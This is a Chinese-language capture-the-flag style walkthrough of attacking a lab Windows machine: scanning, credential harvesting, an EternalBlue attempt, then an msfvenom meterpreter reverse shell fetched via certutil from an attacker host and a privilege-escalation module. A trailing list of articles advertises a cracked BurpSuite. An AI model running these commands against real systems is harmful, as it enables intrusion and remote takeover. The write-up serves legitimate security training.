7.1 信息打点
nmap -sS -p- -T4 10.10.10.161 -A
使用目录扫描出来一个admin后台界面
查看源码发现账号密码信息
登录进来发现一个base编码
解密
ftpuser:KeepGoingBro!!!
7.2 登录FTP
使用刚刚的账号密码登录
ftp 10.10.10.161
发现了一个robots.txt,使用下面的命令将它下载下来
get robots.txt
查看这个robots.txt中的文件
管理员的秘密笔记
1)禁用防火墙和 Windows Defender。
2)启用 FTP 和 SSH。
3)启动 Apache 服务器。
4)别忘了更改用户“always”的密码。当前密码是“WW91Q2FudEZpbmRNZS4hLiE=”。又得到一个密码
always:YouCantFindMe.!.!
7.3 远程登录
发现密码不对,我们来使用hydra来爆破rdp协议
使用enum4linux枚举,看到支持的smb协议,为1.0和2.0/2.1,3.0以上均不支持,让我联想到了永痕之蓝漏洞(MS17-010)
enum4linux-ng -A 10.10.10.161 -C
含义:-A 是 --all 的缩写,表示执行全量信息收集,包含以下枚举内容:
- 主机基础信息(主机名、工作组 / 域、MAC 地址);
- SMB 协议支持情况(支持的 SMB 版本、签名配置);
- 用户和组列表(本地用户、域用户、内置组等);
- 共享目录(可访问的 SMB 共享及权限);
- 操作系统版本(通过 RPC 或 SMB 信息推断);
- 服务、打印机、系统策略等其他信息。
7.4 永痕之蓝
利用,很遗憾利用失败
利用nxc枚举这两个账号密码
always:YouCantFindMe.!.!
ftpuser:KeepGoingBro!!!
看到ftpuser用户,尝试登录,也不让远程登录
7.5 近源攻击
这里没找到其他方法,直接登录靶机上传shell吧(近源攻击),这里还需要注意,就是需要修改一下语言为美国的,不然登录不进去
7.6 Msf获取反向shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.137 LPORT=4444 -f exe -o shell.exe
certutil -urlcache -split -f http://10.10.10.137:8000/shell.exe c:\1.exe
msf上线
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.137
set lport 4444
run
7.6 MSF内核漏扫
use multi/recon/local_exploit_suggester
使用第一个模块,设置第一个会话,并进行提权
##
往期推荐
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
新版BurpSuite v2025.6.3汉化版,附激活教程
重大更新!FeatherScan v4.5 内网 linux 信息收集,提权一键梭哈神器
FeatherScan v4.0 - 一款Linux内网全自动信息收集工具
近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等
内网渗透必备,microsocks,一个轻量级的socks代理工具
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏
【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!
【oscp】vulnerable_docker,三种代理方法打入内网
【内网渗透】CobaltStrike与MSF联动互相上线的方式
内网渗透必备,microsocks,一个轻量级的socks代理工具
【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!
DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学
不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学
ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略
评论 (0)